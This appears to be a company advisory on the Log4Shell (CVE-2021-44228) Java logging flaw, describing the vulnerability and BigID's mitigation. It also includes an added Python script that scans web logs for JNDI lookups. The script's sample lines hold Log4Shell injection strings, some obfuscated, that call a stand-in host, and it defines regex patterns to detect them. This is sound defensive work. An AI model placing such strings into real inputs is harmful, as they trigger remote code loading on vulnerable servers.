Update on Apache Log4J (Log4Shell) Vulnerability
On December 10, 2021, security researchers discovered a zero-day vulnerability in a widely used Java logging library that can affect millions of cloud and enterprise applications. It is tracked as CVE-2021-44228 and is also known by the names Log4Shell and LogJam. Affecting far more than just Minecraft, this vulnerability extends to cloud services from Apple iCloud to Twitter and beyond.
The BigID team acted immediately and has been working since yesterday to protect our customers from the impact of the exploit. All BigID cloud services (including BigID Cloud, SmallID, BigID.me and Privacy Portal) are currently protected with updated security configurations against the vulnerability.
Identifying risk and ensuring the protection of our customers is our priority, and we continue to work directly with our customers to provide guidance and support for protecting their on-prem implementations.
What is Log4j?
Log4j is an open-source Apache logging framework used by developers for record-keeping within an application. It is a Java library used broadly across enterprise software and cloud applications, including at Amazon, Apple iCloud, Tesla, Twitter, Red Hat, Minecraft, and more.
CVE-2021-44228 is a vulnerability in Apache Log4j through which attackers can send malicious code that can potentially result in their gaining control of the server.
Log4Shell and LogJam are the names given to the related exploits. The vulnerability means that an attacker can craft a string that Log4j will log, and that logged string can then be used to remotely take over the server.
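A defender-side check for the mechanism just described, added here as an illustration and not part of BigID's advisory or its tooling: it scans web-access log lines for the `${jndi:` lookup syntax that CVE-2021-44228 evaluates, first collapsing the nested `${lower:}`, `${upper:}` and default-value lookups that are commonly used to disguise that prefix. The log lines, IP addresses and hostnames are constructed sample data.

```python
import re

# Constructed sample access-log lines (not taken from the page or any real system).
# Lines 2-4 carry a Log4j lookup in the User-Agent or query string; 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${j${::-n}di:rmi://example.invalid/c} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:12:00:05 +0000] "GET /price?id=${env:HOME} HTTP/1.1" 200 77 "-" "x"',
]

# Nested lookups that Log4j resolves before evaluating the outer ${jndi:...} lookup.
# Resolving them here is a detection heuristic (assumption), not a re-implementation of Log4j.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${undefined:-x} resolves to x
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse ${lower:x}, ${upper:x} and ${...:-x} lookups from the inside out.

    Each round substitutes the innermost occurrences; the loop stops when a round
    changes nothing or after max_rounds, so a hostile line cannot spin forever.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def has_jndi_lookup(line: str) -> bool:
    """True if the line, after normalization, contains a ${jndi: lookup."""
    return _JNDI.search(normalize_lookups(line)) is not None


def find_suspicious(lines):
    """Return (1-based line number, line) for every line carrying a JNDI lookup."""
    return [(i, line) for i, line in enumerate(lines, 1) if has_jndi_lookup(line)]


if __name__ == "__main__":
    for number, line in find_suspicious(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

The `${env:HOME}` line is deliberately not flagged: it is a lookup but not a JNDI one, so it would only add noise to this particular check.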
We will continue to monitor as this situation evolves and will update this page with any changes.